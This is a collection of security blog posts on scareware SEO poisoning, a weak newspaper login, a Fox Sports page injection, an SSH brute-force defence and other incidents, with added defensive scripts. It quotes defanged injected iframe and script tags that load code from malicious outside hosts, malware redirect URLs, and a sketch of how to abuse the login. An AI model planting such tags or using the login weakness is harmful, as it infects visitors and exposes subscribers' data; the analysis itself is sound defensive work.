Hacking


If you have used the web for any length of time at all, it is quite likely that you have seen a pop-up box similar to the one above on your computer when visiting a web site.  In the security industry this type of malware is frequently referred to as scareware or rogue anti-virus.  When confronted with this message, many people will unsuspectingly click the “OK” button, which will usually install some type of malware that claims your machine is infected with a virus.  It then offers to remove the virus if you purchase a product.  The problem is that not only will this not protect your machine, it will likely lead to further system compromise and possibly the loss of personally identifiable information or credit card data.

A client of mine recently called to inform me that his system had been infected with malware after clicking the “OK” button on the above pop-up box.  After removing the malware from his machine, I decided to dig further into this scareware campaign.  The client reported that he performed a search for “tatiana banx” and one of the top 10 results took him to this site.

I started my analysis by performing the same search as my client.  The results of my search are shown below.  Notice the 10th result which I have highlighted with a red arrow.

The URL is hxxp://collin-county-real-estate.rmdfw.com/gsfyn/yuxfm.php?gu=500242.  Also notice all the keywords listed for “tatiana”.  This one caught my attention and, sure enough, clicking on this link takes you to a rogue AV site.  Moreover, your browser becomes unusable except to click the “OK” button.  In fact, clicking on any part of the pop-up box installs the malware, indicating that clickjacking is part of this attack as well.  The only way to prevent infection after clicking on the link in the search result is to kill the browser process.

So, the first part of this scareware campaign is the use of SEO poisoning to rank highly in search results for the term “tatiana banx”, among others.  This is a common technique used by scammers to increase traffic to their sites and to increase infection rates.  But how did they do this?  I began by investigating the collin-county-real-estate.rmdfw.com site.  This site is the Dallas-Fort Worth Re/Max Realtor web site.  The A record for this server is 216.177.141.4 with a PTR of web17.websitesource.net.  Thus, it appears that this site is hosted at WebSiteSource, with a location somewhere in Kansas if the geoIP information is accurate.  Next I examined the web server itself and found that directory listing was enabled, which led to a treasure trove of interesting information.

This is only a partial list of the over 330 files on this server that appear to be part of an SEO poisoning campaign.  Examination of these files indicates that this server is being used to manipulate search results for many, many different search terms.  For example, the search I performed for “tatiana banx” returned hxxp://collin-county-real-estate.rmdfw.com/gsfyn/yuxfm.php?gu=500242.  A partial listing of the contents of the file 500242 follows:

<a href=hxxp://collin-county-real-estate.rmdfw.com>collin-county-real-estate.rmdfw.com</a><p> tatiana milovani </p>
<p> shte eet glawa ivanova tatiana che </p>
<p> eest ivanova tatiana dean electrical </p>
<p> tatiana narvaez </p>
<p> life info on tatiana golovin </p>
<p> tatiana isotov </p>
<p> mary tatiana krot </p>
<p> tatiana fistrovic and us visa </p>
<p> tatiana gregorieva </p>
<p> tatiana keeshan </p>
<p> tatiana petit </p>
<p> tatiana scam </p>
<p> tatiana startseva parkville </p>
<p> chris tatiana </p>
<p> tatiana free pics </p>
<p> tatiana nikolaevna tumanova </p>
<p> tatiana ali in king mag </p>
<p> tatiana jones </p>
<p> tatiana petersen </p>
<p> find tatiana schwappach </p>
<p> tatiana alverez </p>

Other files on this server show similar content for different search terms.  It appears that this server is being used as part of an SEO poisoning campaign, likely without the knowledge of the web site’s owner.  Furthermore, assuming that the owners of the rmdfw.com domain are not purposely redirecting traffic to malware distribution sites, it is likely that this server has been compromised.

The next step in my analysis involves an examination of the method that the site uses for redirecting traffic from hxxp://collin-county-real-estate.rmdfw.com to another site that attempts to install malware on the visitor’s machine.  This turns out to be the most interesting part.  There is a PHP script (yuxfm.php) that redirects to various other sites that host the scareware campaign.  You will only be redirected if you click on the URL from a search result, indicating that the referer is being used to determine how traffic will be handled.  Using a proxy to capture all of the communication between my system and the servers involved, I was able to reconstruct the sequence of events.  After performing a search and clicking on the URL hxxp://collin-county-real-estate.rmdfw.com/gsfyn/yuxfm.php?gu=500242 which was the 10th result presented, the server responds with a 302 redirect to one of several different URLs.  Below is the original request:

GET http://collin-county-real-estate.rmdfw.com/gsyfn/yuxfm.php?gu=500242 HTTP/1.1
Host: collin-county-real-estate.rmdfw.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.1.2) Gecko/20090729 Firefox/3.5.2 GTB7.1 (.NET CLR 3.5.30729) Paros/3.2.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?hl=&q=tatiana+banx&sourceid=navclient-ff&rlz=1B3GGGL_enUS340US341&ie=UTF-8
Cookie: Hello-friend=4

And the response:

HTTP/1.1 302 Found
Date: Tue, 27 Jul 2010 02:37:50 GMT
Server: Apache
Set-Cookie: Hello-friend=5
Location: hxxp://zeoro1.strangled.net/3/?c=947
Content-Type: text/html
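
The referer-dependent 302 shown above is also the fingerprint a site owner can look for in their own access logs. The script below is an added example, not code from the original post: it parses Apache combined-log lines and flags any path that answers search-engine referrals with a 302 while never redirecting direct visitors, which is exactly how yuxfm.php behaves. The log lines, client addresses and the list of search-engine hostnames are constructed assumptions.

```python
import re
from collections import defaultdict

# Constructed sample Apache combined-log lines (not taken from the compromised server).
SAMPLE_LOG = """\
216.0.0.1 - - [27/Jul/2010:02:37:50 +0000] "GET /gsfyn/yuxfm.php?gu=500242 HTTP/1.1" 302 0 "http://www.google.com/search?q=tatiana+banx" "Mozilla/5.0"
216.0.0.2 - - [27/Jul/2010:02:38:10 +0000] "GET /gsfyn/yuxfm.php?gu=500242 HTTP/1.1" 200 8231 "-" "Mozilla/5.0"
216.0.0.3 - - [27/Jul/2010:02:39:01 +0000] "GET /gsfyn/yuxfm.php?gu=117733 HTTP/1.1" 302 0 "http://search.yahoo.com/search?p=foo" "Mozilla/5.0"
216.0.0.4 - - [27/Jul/2010:02:40:00 +0000] "GET /index.html HTTP/1.1" 200 5120 "http://www.google.com/search?q=collin+county+realtor" "Mozilla/5.0"
216.0.0.5 - - [27/Jul/2010:02:41:00 +0000] "GET /login.php HTTP/1.1" 302 0 "-" "Mozilla/5.0"
"""

# Apache "combined" format: ip ident user [time] "request" status size "referer" "agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<url>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

# Assumption: these engines are the referrers the doorway script keys on.
SEARCH_REFERER_RE = re.compile(r'^https?://([^/]*\.)?(google|yahoo|bing|ask)\.[^/]+/', re.I)


def parse_line(line):
    """Return the log fields as a dict, or None for a line that is not combined format."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def find_cloaked_paths(log_text):
    """Return {path: counters} for paths that 302 every search-engine visitor and no direct visitor."""
    stats = defaultdict(lambda: {"search_302": 0, "search_other": 0,
                                 "direct_302": 0, "direct_other": 0})
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        path = rec["url"].split("?", 1)[0]          # ignore the ?gu= doorway id
        from_search = bool(SEARCH_REFERER_RE.match(rec["referer"]))
        redirected = rec["status"] == "302"
        key = ("search" if from_search else "direct") + ("_302" if redirected else "_other")
        stats[path][key] += 1

    suspicious = {}
    for path, s in stats.items():
        # Cloaking signature: search traffic is always redirected, direct traffic never is.
        if s["search_302"] > 0 and s["search_other"] == 0 and s["direct_302"] == 0:
            suspicious[path] = dict(s)
    return suspicious


if __name__ == "__main__":
    for path, counters in find_cloaked_paths(SAMPLE_LOG).items():
        print(path, counters)
```

A non-zero direct_other count alongside the search-only 302s is the strongest signal, because it shows the same file serving normal content to anyone who did not arrive from a search engine; a path with no direct hits at all is worth a manual look but could simply be an ordinary redirect.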

In this case I was redirected to hxxp://zeoro1.strangled.net/3/?c=947.  This server then presents the scareware that attempts to trick the visitor into installing malware.  Notice the JavaScript (4c4e43dde34f8.js) that gets executed on the client; no doubt this is the source of the malware.  The site also includes images that resemble actual Windows warning messages in order to increase the likelihood that the visitor will be fooled into accepting the malware:

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<link href="style.css" rel="stylesheet" type="text/css" />
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta http-equiv="Content-Language" content="en" />
<meta http-equiv="Cache-control" content="Public" />
<title>Online Protection</title>
<link rel="icon" href="images/favicon.ico" type="image/x-icon" />
<link rel="shortcut icon" href="images/favicon.ico" type="image/x-icon" />
<script type="text/javascript" src="4c4e43dde34f8.js?c=947"></script>
</head>
<body>
<div id="loading" style="display:block">
<div>
<img height="50" width="50" style="margin-right: 8px; float: left; vertical-align: top;" src="images/loading.gif"/>
<br/>
<span id="loadspan">Initializing Virus Protection System…</span>
</div>
</div>
</body>
</html>

The redirect target changes frequently in an attempt to make detection and investigation more difficult.  In fact, since I started my analysis a week ago, the collin-county-real-estate.rmdfw.com URL no longer shows up when searching for “tatiana banx” and no longer appears to be used in this malware campaign.  However, other top 10 search results for “tatiana banx” lead to the same scareware tactics.  For example, today hxxp://tmsoftwaresolutions.co.uk/linmx/plol.php?gi=438195 shows up as the number 6 result.  It is also important to keep in mind that this type of attack is not confined to searches for “tatiana banx”.  It is clear that whoever is behind this attack is targeting many different search terms, and thus all search results should be viewed with care.  Also, it appears that many compromised servers are part of this campaign, leading to the conclusion that this is not an isolated case.

To summarize, this scareware campaign makes use of a variety of techniques in order to spread its malware.  First, it uses compromised hosts to manipulate search results and drive traffic to its servers, a technique called SEO poisoning.  When a visitor clicks on one of these bogus search results, they are redirected to the malware delivery host, which serves up content designed to make the visitor think their machine is infected with a virus.  If the visitor clicks on the pop-up box to try and “remove” the virus, they will actually be installing malware on their machine.  This malware pretends to be an anti-virus program, but in fact is malicious software.  In the near future I will be conducting further analysis on the hosts involved, how they may have been compromised and used as part of this malware distribution campaign, and the nature of the malware itself.



Recently I decided that I would no longer maintain my subscription to the local newspaper, The News and Observer.  Like many people, I find that I get most of my news online these days and didn’t want to continue paying for something I didn’t use.  I decided to look at their web site to see if I could cancel my subscription online.  This is where I discovered that newsandobserver.com uses a terrible authentication mechanism that can lead to the disclosure of personal information and unauthorized changes to paper delivery and other subscription options.

The crux of the problem is that the web site relies on publicly available information to authenticate subscribers.  Below is a screenshot of the subscriber login screen.

As you can see, all that is required to log in to a subscriber account is a phone number and house number.  Both of these pieces of information are easily obtained online for most people.  After authentication, you have access to the subscriber’s account, where you can gain additional information about them.  The most important information that you can get access to is the subscriber’s email address.  This would be useful to scammers, who could set up a fake site that resembles the real newsandobserver.com, send the subscriber an email telling them that they need to update their account information, and then obtain their credit card or other financial account data.  Below is a screenshot of my account home page.

Another thing that you can do within the subscriber section is manipulate delivery options.  For example, you can put stops on delivery or extend your subscription.  This would allow an unauthorized person to put a hold on someone else’s paper delivery or even change the length of their subscription, both of which could have a financial impact on the subscriber.  Below is a screenshot showing the ability to change these options.

Lastly, subscribers are able to change their personal information such as email address and phone number.  There is also a check-box to disable email notification of account changes.  A scammer could use this option to prevent notifications from being sent to the subscriber after he made changes to the account.  By updating the email address and phone number to one of his choosing, he may even be able to use social engineering to obtain credit card information from an N&O customer service representative.  Below is a screenshot of the page that allows a subscriber to change personal information.

Such a weak authentication mechanism is inexcusable for the second largest newspaper in the state of North Carolina.  With over 750,000 print and online readers, there are many opportunities for scammers to use this weakness to obtain subscribers’ personally identifiable information and potentially additional financial information.  It would not be difficult to automate a process for gathering phone numbers and house numbers for prominent people in North Carolina, many of whom are likely to subscribe to the News and Observer, attempt to login as these individuals, and obtain their email addresses.  With such a list in hand, it would be possible to send them fake emails appearing to be from the N&O that could trick them into divulging their credit card numbers.

I have contacted NewsandObserver.com to report this vulnerability to them.  Remediation is not difficult.  There are many types of authentication mechanisms that work well, and OWASP has a great site dedicated to this topic.  I hope that they take advantage of it to correct this issue.
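
Since the post says remediation is not difficult, here is an added example of what an adequate subscriber login looks like (illustration code, not the newspaper's site and not an OWASP sample): a user-chosen secret stored as a salted scrypt hash, a constant-time comparison that runs even for unknown usernames, a lockout after repeated failures, and a change notification that always goes to the previous e-mail address with no opt-out box. The in-memory store, account names, thresholds and the dummy values are assumptions.

```python
import hashlib
import hmac
import os
import time

# Constructed in-memory store for illustration only (assumption: a real site uses a database).
# Each record keeps a per-user random salt and an scrypt hash; the password itself is never stored.
_ACCOUNTS = {}
_FAILED = {}             # username -> (consecutive failures, locked-out-until timestamp)
_NOTIFICATIONS = []      # (recipient address, message) pairs a mailer would deliver
MAX_ATTEMPTS = 5
LOCKOUT_SECONDS = 900
_DUMMY_SALT = b"\x00" * 16   # used so unknown users cost the same time as real ones
_DUMMY_HASH = b"\x00" * 32


def _hash(password, salt):
    # scrypt is deliberately slow and memory-hard, which blunts offline guessing if the store leaks.
    return hashlib.scrypt(password.encode(), salt=salt, n=2 ** 14, r=8, p=1, dklen=32)


def register(username, password, email):
    if len(password) < 12:
        raise ValueError("password too short")
    salt = os.urandom(16)
    _ACCOUNTS[username] = {"salt": salt, "hash": _hash(password, salt), "email": email}


def authenticate(username, password, now=None):
    """True only for a known user, the right password, and no active lockout."""
    now = time.time() if now is None else now
    count, locked_until = _FAILED.get(username, (0, 0.0))
    if now < locked_until:
        return False                      # locked out: do not even evaluate the password
    rec = _ACCOUNTS.get(username)
    # Always compute a hash so response time does not reveal which usernames exist.
    salt = rec["salt"] if rec else _DUMMY_SALT
    expected = rec["hash"] if rec else _DUMMY_HASH
    candidate = _hash(password, salt)
    if rec is not None and hmac.compare_digest(candidate, expected):
        _FAILED.pop(username, None)       # success clears the failure counter
        return True
    count += 1
    locked_until = now + LOCKOUT_SECONDS if count >= MAX_ATTEMPTS else 0.0
    _FAILED[username] = (count, locked_until)
    return False


def change_email(username, new_email):
    """Every contact change notifies the previous address; there is no way to suppress it."""
    rec = _ACCOUNTS[username]
    old = rec["email"]
    rec["email"] = new_email
    _NOTIFICATIONS.append((old, f"Your e-mail address was changed to {new_email}."))
    return old


if __name__ == "__main__":
    register("alice", "correct horse battery", "alice@example.com")
    print(authenticate("alice", "correct horse battery"))   # True
    print(authenticate("alice", "not the password"))        # False
```

The point of the design is that nothing the login depends on is public: the phone number and house number can still be on file, but they are account data, not credentials, and changing where notifications go is itself a change that gets announced to the old address.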

In October of 2009 the Fox Sports web site was found to have been compromised with an iframe that redirected visitors to a site hosting malicious content.  The affected URL was hxxp://msn.foxsports.com/fantasy/baseball/hotstreak/external and an example of the injected code is below:

<iframe src="hxxp://thingre.com/in.php" width="1" height="1" style="visibility:hidden;position:absolute"></iframe>

Anyone who accessed this site while the malicious code was active could potentially have had their computer infected with malware.  Fox Sports administrators eventually removed the iframe, but today the same page was infected again.  This time the below two script tags were injected:

<script src=hxxp://akcworld.com/genco/fusion-request-a-password.php ></script><body topmargin="0" leftmargin="0" marginheight="0" marginwidth="0">

and

<script src=’hxxp://nt002.cn/E/J.JS’></script>

These same two scripts were also used in the October Fox Sports web site compromise incident.  The akcworld.com and nt002.cn domains are widely known to host malicious content and are frequently used as part of the Gumblar campaign.  At approximately 9:50pm I checked the Fox Sports web site to verify whether the page was still infected.  It was not.  I then checked the page information and saw that it had been modified at 9:39pm EST, just 10 minutes before I checked the site.

[Screenshot: foxsports]

The Fox Sports administrators moved very quickly this time to rectify the site compared to the October incident, which took nearly two weeks to address.  However, this situation obviously raises the question of how the Fox Sports web site keeps being compromised.  I can think of several possibilities that would explain how this could occur: 1) the hackers installed a backdoor that they continue to use for access; 2) the hackers continue to use compromised credentials to the web site; 3) a vulnerability exists in the web site that has not been remediated; or 4) Fox Sports administrators restored an older version of the page that included the malicious code from the October hack.  We won’t likely learn the root cause of this compromise any time soon, but it is certain that unless Fox Sports takes preventative action, it will probably occur again.
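
Whatever the root cause turns out to be, a site operator can catch this kind of injection before visitors do by checking published pages against an allow-list of script and iframe origins. The scanner below is an added example, not Fox Sports code: it embeds the three injected tags quoted in this post (defanged with hxxp exactly as written above, so nothing is fetched) in a constructed page and reports every external script or iframe whose origin is not trusted, plus any 1x1 or hidden iframe regardless of origin. The trusted-origin list and the sample page are assumptions.

```python
from html.parser import HTMLParser
from urllib.parse import urlparse

# Constructed sample page: one legitimate local script, one legitimate widget iframe,
# and the three injected tags quoted in the post (hxxp-defanged, never requested).
SAMPLE_HTML = """<html><head>
<script src="/js/site.js"></script>
<script src=hxxp://akcworld.com/genco/fusion-request-a-password.php ></script><body topmargin="0">
<script src='hxxp://nt002.cn/E/J.JS'></script>
<iframe src="hxxp://thingre.com/in.php" width="1" height="1" style="visibility:hidden;position:absolute"></iframe>
<iframe src="https://msn.foxsports.com/widgets/scores" width="300" height="200"></iframe>
</body></html>"""

# Assumption: the hosts the site legitimately loads scripts and frames from.
TRUSTED_ORIGINS = {"msn.foxsports.com"}


class InjectionScanner(HTMLParser):
    """Collects (tag, src, reasons) for every suspicious <script> or <iframe>."""

    def __init__(self, trusted):
        super().__init__()
        self.trusted = trusted
        self.findings = []

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag not in ("script", "iframe") or not a.get("src"):
            return
        src = a["src"].strip()
        # Undo the hxxp defanging only for parsing; relative URLs have no hostname.
        host = urlparse(src.replace("hxxp", "http", 1)).hostname
        if host is None:
            return
        reasons = []
        if host.lower() not in self.trusted:
            reasons.append("untrusted origin")
        if tag == "iframe":
            if a.get("width") == "1" or a.get("height") == "1":
                reasons.append("1x1 iframe")
            if "hidden" in (a.get("style") or "").lower():
                reasons.append("hidden iframe")
        if reasons:
            self.findings.append((tag, src, reasons))


def scan(html, trusted=TRUSTED_ORIGINS):
    """Return the list of suspicious tags found in an HTML document."""
    parser = InjectionScanner(trusted)
    parser.feed(html)
    parser.close()
    return parser.findings


if __name__ == "__main__":
    for tag, src, reasons in scan(SAMPLE_HTML):
        print(f"{tag:<7} {src}  ({', '.join(reasons)})")
```

Run against a freshly fetched copy of each page on a schedule and alert on any finding; because the check keys on origin rather than on specific domains, it would have flagged the October iframe and both of today's script tags with the same rule.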

On Thursday we awoke to a good old-fashioned web site defacement and the public release of emails and other personal information of some of the most prominent names in the information security field.  A group hacked into the servers of Dan Kaminsky, Julien Tinnes, and Kevin Mitnick, to name just a few.  The information they obtained and disclosed includes email correspondence, phone numbers, userids and passwords of many of the world’s most notable whitehat security researchers.  Some of this information is very personal and quite embarrassing to have publicly disclosed to the entire Internet.  Moreover, it is likely that this disclosure will lead to a great deal of spam and nuisance phone calls for the people whose information was disclosed, as well as possible attacks on other systems.

These days it is unusual for hackers to deface web sites and publicly embarrass others.  Most are more concerned with making money and thus try to work silently without being noticed.  The defacement of Kaminsky’s web site is reminiscent of the old school gamesmanship in which hackers would try to publicly humiliate others by defacing their web sites.  This attack has prompted Kaminsky to take his site (http://www.doxpara.com) offline, although you can still see the defaced version in Google’s cache.  I have also included it below.

[Screenshot: doxpara defacement]

It is not known how the hackers were able to crack the servers, but it goes to show that a determined attacker can probably find an exploitable vulnerability in any system if given enough time and resources.  There is no such thing as a completely secure system, except one that is turned off.  It is the job of the security professional to reduce risk to an acceptable level given the value of the asset that is being protected.  While none of the information disclosed could be considered valuable in a monetary sense, having it disclosed so publicly is certainly embarrassing and could damage their reputations and their businesses.  No system is safe, and we should all take heed of the threats that are out there.

Hoaxes as Threats

[Image: emma-watson]

A few days ago I went to see the latest installment of the Harry Potter movies.  So it is timely that a new Internet hoax emerged today playing on the popularity of the film and its actors.  A hoax spread rapidly today via email and social networking sites such as Facebook and Twitter about the death of Emma Watson who plays Hermione Granger in the popular films.  The hoax claimed that the actress had died in a car accident.  Below is one example of the bogus news report:

On July 24, 2009, Watson was en route to her mansion in Oxfordshire, England. Police footage captured her driving with speeds up to 80 miles per hour on very narrow roads. Oxfordshire paramedics received a 999 call at 12:22 p.m. (GMT), about an sportcar having crashed into a wall at a petrol station. At this point it was still unknown that the victim was indeed Emma Watson. Three minutes after the call got through, paramedics arrived at Watson's location. She was reportedly not breathing and the car was total loss. After 5 minutes the Oxfordshire Fire Department managed to get Watson out of her car. Resuscitation efforts continued en route to the Oxfordshire's Medical Center, and for an hour after arriving there at 1:45 p.m. (GMT). She was pronounced dead at 2:10 p.m. (GMT).

Unfortunately, by forwarding this information, people are unwittingly helping scammers install rogue anti-virus software on unsuspecting users’ computers.  Criminals have used blackhat SEO poisoning to get searches related to Emma Watson’s death ranked very high in search results.  For example, I did a Google search on “emma watson die” and the 6th and 8th results were redirects to malicious sites that attempted to install rogue anti-virus software:

[Screenshot: rogueav]

Fortunately, Google warns that this is a malicious web site due to its listing at stopbadware.org.  However, there are many others besides this one in the top 20 search results, so do yourself a favor and stay away from them.  And most importantly, don’t forward any news articles or emails related to this hoax.  In general, this is good advice for email chain letters, get rich quick spam, jokes, and any other nuisance email that finds its way into your inbox.


If you manage a system connected to the Internet that allows inbound SSH traffic, and you check your system logs periodically, no doubt you have noticed the failed login attempts from rogue systems trying to brute force your machine. These brute force attempts are typically generated by systems that have been compromised themselves (bots) and are attempting to infect more systems to add to the botnet. They generally are not very subtle, generating lots of log entries and setting off any IDS that may be monitoring the network. Below is an example of the logs generated by such brute force attempts on an RHL-compatible system:

Dec 8 13:28:51 websrv1 sshd[14407]: Failed password for invalid user test from 201.47.187.138 port 55732 ssh2
Dec 8 13:28:54 websrv1 sshd[14409]: Failed password for invalid user anda from 201.47.187.138 port 56250 ssh2
Dec 8 13:28:58 websrv1 sshd[14411]: Failed password for invalid user jb from 201.47.187.138 port 56723 ssh2
Dec 8 13:29:02 websrv1 sshd[14413]: Failed password for invalid user cvsuser from 201.47.187.138 port 57255 ssh2
Dec 8 13:29:05 websrv1 sshd[14415]: Failed password for invalid user cvsuser1 from 201.47.187.138 port 57761 ssh2
Dec 8 13:29:09 websrv1 sshd[14417]: Failed password for invalid user mana from 201.47.187.138 port 58263 ssh2
Dec 8 13:29:13 websrv1 sshd[14420]: Failed password for invalid user mysql from 201.47.187.138 port 58810 ssh2
Dec 8 13:29:17 websrv1 sshd[14422]: Failed password for invalid user mysql from 201.47.187.138 port 59342 ssh2

Here you can see that the host 201.47.187.138 tried to log in as the users mysql, mana, cvsuser1, cvsuser, jb, anda, and test, all in the space of about 26 seconds. And this was just one snippet of logs from Dec 8. This happens every day, many times per day, and from many different attacking systems. Large networks frequently have intrusion detection/prevention systems to help block these types of attacks. But what should administrators of small networks, with few resources, do to combat these brute force attempts?

First, you have to check your logs. Manual scanning of logs is fine, but there are tools that can make this task much easier. One example of such a tool is Logwatch, which comes as part of many Linux distributions. It will analyze your logs and send you reports of system activity, which will help you spot these types of events. Second, keep the number of accounts that are allowed to log in to the system via SSH to a minimum. Always use the “AllowUsers” option to specify which accounts are allowed access remotely, and absolutely do not allow root to log in via SSH. This is the first account brute forcers attempt to crack when trying to exploit your system. Finally, take advantage of iptables to block access from those systems that are attempting to access your system illegally. You can either do this manually or write a script to block them automatically based on log entries. There are also a number of blacklists available on the Internet that provide a good starting point of hosts/networks to block even if they have not tried to brute force your machine (yet).
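
The log-reading and iptables steps above can be scripted. The following is an added example, not a tool from the post: it parses sshd failed-password lines in the format shown, counts failures per source address inside a sliding time window, and produces the iptables commands that would block sources crossing the threshold. The commands are returned as strings for an administrator (or a wrapper script) to run, not executed here. The assumed log year, the extra sample lines, the threshold and the window size are constructed assumptions.

```python
import re
from collections import defaultdict, deque
from datetime import datetime

# Constructed sample in the syslog/sshd format shown in the post (syslog lines carry no year).
SAMPLE_LOG = """\
Dec 8 13:28:51 websrv1 sshd[14407]: Failed password for invalid user test from 201.47.187.138 port 55732 ssh2
Dec 8 13:28:54 websrv1 sshd[14409]: Failed password for invalid user anda from 201.47.187.138 port 56250 ssh2
Dec 8 13:28:58 websrv1 sshd[14411]: Failed password for invalid user jb from 201.47.187.138 port 56723 ssh2
Dec 8 13:29:02 websrv1 sshd[14413]: Failed password for invalid user cvsuser from 201.47.187.138 port 57255 ssh2
Dec 8 13:29:05 websrv1 sshd[14415]: Failed password for invalid user cvsuser1 from 201.47.187.138 port 57761 ssh2
Dec 8 13:30:00 websrv1 sshd[14500]: Failed password for root from 10.0.0.7 port 40000 ssh2
Dec 8 13:31:00 websrv1 sshd[14501]: Failed password for bob from 192.0.2.9 port 40001 ssh2
Dec 8 14:31:00 websrv1 sshd[14502]: Failed password for bob from 192.0.2.9 port 40002 ssh2
Dec 8 14:31:05 websrv1 sshd[14503]: Accepted password for bob from 192.0.2.9 port 40003 ssh2
"""

# Matches both "invalid user NAME" (no such account) and plain "NAME" (real account, wrong password).
FAILED_RE = re.compile(
    r'^(?P<mon>\w{3})\s+(?P<day>\d+) (?P<time>\d\d:\d\d:\d\d) \S+ sshd\[\d+\]: '
    r'Failed password for (?:invalid user )?(?P<user>\S+) from (?P<ip>\S+) port \d+'
)


def parse_failures(log_text, year=2009):
    """Yield (timestamp, user, ip) for every failed-password line; year is assumed."""
    for line in log_text.splitlines():
        m = FAILED_RE.match(line)
        if m is None:
            continue
        ts = datetime.strptime(f"{year} {m['mon']} {m['day']} {m['time']}", "%Y %b %d %H:%M:%S")
        yield ts, m["user"], m["ip"]


def offenders(log_text, threshold=5, window_seconds=600, whitelist=()):
    """Return {ip: set of usernames tried} for sources with >= threshold failures in any window."""
    recent = defaultdict(deque)      # ip -> timestamps still inside the window
    users = defaultdict(set)
    flagged = {}
    for ts, user, ip in parse_failures(log_text):
        if ip in whitelist:           # never lock out your own management hosts
            continue
        q = recent[ip]
        q.append(ts)
        users[ip].add(user)
        while (ts - q[0]).total_seconds() > window_seconds:
            q.popleft()               # drop failures that aged out of the window
        if len(q) >= threshold:
            flagged[ip] = users[ip]
    return flagged


def iptables_rules(flagged):
    """iptables commands to drop SSH from each flagged source (strings only; nothing is run)."""
    return [f"iptables -I INPUT -s {ip} -p tcp --dport 22 -j DROP" for ip in sorted(flagged)]


if __name__ == "__main__":
    hits = offenders(SAMPLE_LOG)
    for ip, names in hits.items():
        print(ip, "tried", sorted(names))
    print("\n".join(iptables_rules(hits)))
```

The two failures from 192.0.2.9 an hour apart followed by a successful login look like a user mistyping a password, and the default window leaves them alone; lowering the threshold or widening the window trades that tolerance for a faster reaction to slow, spread-out guessing, which is the subtler pattern mentioned below.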

Newer attack techniques attempt to be more subtle in the hopes that the attackers will not be noticed by IDPS systems. However, they are still easy to spot with human analysis and the techniques mentioned above. Stay alert and keep your systems secure. We are all in this together.

When I visit the local farmers market with my family, my children are always excited to buy a couple of honey sticks from the local beekeepers.  These are essentially plastic tubes about the size of a straw filled with honey.  Unlike these delicious treats, there is another type of honey stick that isn’t so tasty and could be very harmful to your computer.  The Honey Stick Project, which was started earlier this year, is a research project designed to determine how many people will plug a USB thumb drive that they find in a random place into their computer.  These USB drives have a program on them to “phone home” so that the researcher can determine what percentage of thumb drives distributed to random locations will be accessed.  The results so far?  Out of 33 deployed honey sticks, 42% of them have been accessed.

You may be wondering what the issue is with plugging a found thumb drive into your computer.  I mean hey, who wouldn’t want a free thumb drive, right?  Unfortunately, by plugging a thumb drive from an unknown source into your computer you are putting your system at risk of infection by a virus or trojan.  The autorun feature of many operating systems can automatically execute a malicious program on the drive, which could lead to the compromise of the machine.  Such a compromise could lead to the theft of your bank account information, personal information, usernames, passwords and more.  So if you ever find a USB drive or any other type of media (CDROM, DVD, etc), don’t put it in your machine unless you are feeling very lucky that day.

A well known technique used to test the security of a company’s network is to distribute a few thumb drives in the parking lot of the target company.  These thumb drives will have software on them that will automatically install when the drive is plugged into a computer, leading to the compromise of the system and potentially other systems within the corporate network.  Many unsuspecting people will see these thumb drives while walking through the parking lot, pick one up and plug it in to their computer.  Our curiosity often gets the best of us, leading to unintended consequences (like a visit from the corporate security administrator).

Recently a virus was detected on laptops used in the International Space Station.  It is suspected that it was transmitted via shared USB drives.  There was nothing sweet in those sticks!

Red Hat Servers Hacked

On Friday, August 22, Red Hat announced on its web site that one or more of the servers used as part of the Fedora project had been compromised by hackers.  Even more troubling is the fact that the compromised servers included one that was used to sign Fedora packages.  Company officials claim to be confident that the passphrase that protects the private key used to sign the packages was not obtained.  However, the company did reinstall the affected systems and issued new keys for the signing of the packages as a precautionary measure, which meant downtime for the affected servers.

But the hack did not stop there.  Red Hat also announced that a breach occurred on some of its production systems which allowed the intruder to create and sign some OpenSSH packages for Red Hat Enterprise Linux 4 and 5!  According to Red Hat:

In connection with the incident, the intruder was able to sign a small number of OpenSSH packages relating only to Red Hat Enterprise Linux 4 (i386 and x86_64 architectures only) and Red Hat Enterprise Linux 5 (x86_64 architecture only). As a precautionary measure, we are releasing an updated version of these packages, and have published a list of the tampered packages and how to detect them at http://www.redhat.com/security/data/openssh-blacklist.html.

At this point Red Hat does not believe that its Red Hat Network (RHN) service, which allows customers to download packages from Red Hat, was compromised.  As a result, they do not think that the tampered packages have been widely distributed.  Let’s hope they are right.

The problem with this type of situation is that it is very difficult to tell the extent of the damage.  Red Hat believes they caught the intrusion quickly and rectified the situation.  But what if this has been going on for months?  It seems at least possible that other packages may have been hacked, signed and distributed without their knowledge.  This demonstrates one of the major security issues for software vendors: how to write, maintain and distribute software in a secure manner.  By all accounts Red Hat was following good practices.  They signed all their packages with their private key so that those who downloaded them could verify their authenticity and integrity.  But when your signing server is compromised, all bets are off.

Red Hat is not the first company to be facing such issues.  In 2004 hackers were able to steal 800 MB of source code from Cisco, leading to wide speculation about the security of their products.  A similar theft of source code occurred with Microsoft in that same year.  Software vendors must be extremely vigilant in protecting their products.  One tampered package that goes unnoticed could lead to backdoors in thousands of systems.  Let’s hope that this did not occur with Red Hat.
